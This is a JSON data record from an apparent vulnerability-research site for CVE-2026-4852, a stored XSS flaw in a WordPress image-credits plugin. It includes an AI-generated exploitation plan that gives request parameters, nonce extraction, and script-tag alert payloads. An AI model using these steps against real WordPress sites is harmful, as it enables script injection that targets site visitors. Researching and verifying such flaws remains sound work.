[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f4oHFcKYDBNtZ1rAm6qvNYdLRr770b5nmHC2f-VFSUh0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2026-4852","image-source-control-lite-show-image-credits-and-captions-authenticated-author-stored-cross-site-scripting-via-image-sou","Image Source Control Lite – Show Image Credits and Captions \u003C= 3.9.1 - Authenticated (Author+) Stored Cross-Site Scripting via 'Image Source' Field","The Image Source Control Lite – Show Image Credits and Captions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Image Source' attachment field in all versions up to, and including, 3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","image-source-control-isc",null,"\u003C=3.9.1","3.9.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-20 07:57:34","2026-04-20 20:26:53",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdb0222e2-5a50-43f4-8620-12b97c712dec?source=api-prod",1,[22,23,24,25,26,27,28],"includes\u002Fimage-sources\u002Fimage-sources.php","includes\u002Fimage-sources\u002Frenderer\u002Fglobal-list.php","includes\u002Fimage-sources\u002Frenderer\u002Fimage-source-string.php","includes\u002Fmodel.php","isc.php","public\u002Fpublic.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-4852 (Image Source Control Lite)\n\n## 1. Vulnerability Summary\nThe **Image Source Control Lite** plugin (up to 3.9.1) contains a stored cross-site scripting (XSS) vulnerability. The plugin allows users with Author-level permissions and above to provide an \"Image Source\" for media attachments. The field `isc_image_source` is saved to the database without sanitization and subsequently rendered in the frontend without escaping. Specifically, the `Image_Source_String::render` method explicitly uses an unescaped `echo`, bypassing security linting.\n\n## 2. Attack Vector Analysis\n- **Authentication:** Required (Author or higher).\n- **Vulnerable Parameter:** `attachments[\u003CID>][isc_image_source]` (when using the Media Library AJAX) or `isc_image_source` (when using the Edit Media post page).\n- **Endpoint:** `wp-admin\u002Fpost.php` (for direct edit) or `wp-admin\u002Fadmin-ajax.php` (for Media Library updates).\n- **Preconditions:** The \"Image Sources\" module must be enabled (enabled by default). The payload is triggered when the image source is displayed on the frontend, typically via the `[isc_list_all]` shortcode or the automatically appended source list.\n\n## 3. Code Flow\n1.  **Storage:**\n    - Entry Point: `ISC_Model::isc_fields_save` (hooked to `attachment_fields_to_save`).\n    - Input: `$attachment['isc_image_source']`.\n    - Logic: Calls `save_field($post['ID'], 'isc_image_source', ...)` which calls `update_post_meta`.\n    - **Vulnerability:** No sanitization is applied to the string before storage (unlike the `isc_image_source_url` field which is sanitized).\n2.  **Retrieval:**\n    - `ISC\\Image_Sources\\Renderer\\Image_Source_String::get` fetches the raw meta value using `ISC\\Image_Sources\\Image_Sources::get_image_source_text_raw`.\n3.  **Rendering (Sink):**\n    - Sink: `ISC\\Image_Sources\\Renderer\\Image_Source_String::render` calls `echo self::get( $image_id );`.\n    - **Vulnerability:** Line 21 in `includes\u002Fimage-sources\u002Frenderer\u002Fimage-source-string.php` explicitly ignores escaping: `\u002F\u002F phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped`.\n\n## 4. Nonce Acquisition Strategy\nThis exploit requires an authenticated Author session. The Author must obtain a WordPress core nonce to update attachment metadata.\n\n1.  **Method:** Access the \"Edit Media\" page for a specific attachment.\n2.  **Steps:**\n    - Login as Author.\n    - Navigate to `wp-admin\u002Fpost.php?post=\u003CATTACHMENT_ID>&action=edit`.\n    - Use `browser_eval` to extract the `_wpnonce` from the form.\n3.  **Nonce Action:** The standard WordPress action for editing a post\u002Fattachment is `update-post_\u003CATTACHMENT_ID>`.\n\n## 5. Exploitation Strategy\n### Step 1: Upload and Identify\n- Upload an image as an Author.\n- Capture the Attachment ID (e.g., `5`).\n\n### Step 2: Inject Payload\n- Send a POST request to `wp-admin\u002Fpost.php` to update the attachment meta.\n- **Request Details:**\n    - **URL:** `{{base_url}}\u002Fwp-admin\u002Fpost.php`\n    - **Method:** `POST`\n    - **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    - **Body Parameters:**\n        - `action`: `editpost`\n        - `post_ID`: `\u003CATTACHMENT_ID>`\n        - `_wpnonce`: `\u003CEXTRACTED_NONCE>`\n        - `isc_image_source`: `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n        - `isc_image_source_own`: `` (empty)\n\n### Step 3: Trigger Execution\n- View a page that renders image sources. The most reliable way is to create a page with the `[isc_list_all]` shortcode.\n- **Request Details:**\n    - **URL:** `{{base_url}}\u002F\u003CPAGE_WITH_SHORTCODE>`\n    - **Method:** `GET`\n\n## 6. Test Data Setup\n1.  **User:** Create a user with the `author` role.\n2.  **Image:** Upload an image `test.jpg` via the Author account.\n3.  **Trigger Page:** Create a public page with the following content:\n    ```text\n    [isc_list_all]\n    ```\n    This shortcode (registered in `ISC_Public::register_hooks`) invokes `\\ISC\\Image_Sources\\Renderer\\Global_List::execute_shortcode`, which uses the vulnerable renderer.\n\n## 7. Expected Results\n- The POST request to `post.php` should return a `302` redirect to the edit page with `message=4` (indicating success).\n- The `get_post_meta(\u003CID>, 'isc_image_source', true)` call should return the literal `\u003Cscript>` string.\n- When navigating to the trigger page, the browser should execute the script, showing an alert box.\n\n## 8. Verification Steps\n1.  **Check Database:**\n    ```bash\n    wp post meta get \u003CATTACHMENT_ID> isc_image_source\n    ```\n    Verify it contains the payload.\n2.  **Verify Frontend Output:**\n    Use `http_request` to fetch the trigger page and grep for the raw payload to confirm lack of encoding:\n    ```bash\n    # Search for the unencoded script tag in the response body\n    grep \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"\n    ```\n\n## 9. Alternative Approaches\n### Via Media Grid (AJAX)\nIf the `post.php` method is restricted, use the `save-attachment` AJAX action.\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **Payload:** `action=save-attachment&id=\u003CID>&_wpnonce=\u003CNONCE>&changes[isc_image_source]=\u003Cscript>alert(1)\u003C\u002Fscript>`\n- **Nonce Source:** Localized in the Media Library JS object: `window._wpPluploadSettings.defaults.multipart_params._wpnonce`.\n\n### Via Caption Overlay\nIf the global list is disabled, ensure the \"Show caption on images\" setting is on. The payload will trigger when viewing the post containing the image, as `ISC_Public::add_source_captions_to_content` uses the same unescaped renderer.","gemini-3-flash-preview","2026-04-20 13:05:18","2026-04-20 13:05:43",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","3.9.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fimage-source-control-isc\u002Ftags\u002F3.9.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fimage-source-control-isc.3.9.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fimage-source-control-isc\u002Ftags\u002F3.9.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fimage-source-control-isc.3.9.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fimage-source-control-isc\u002Ftags"]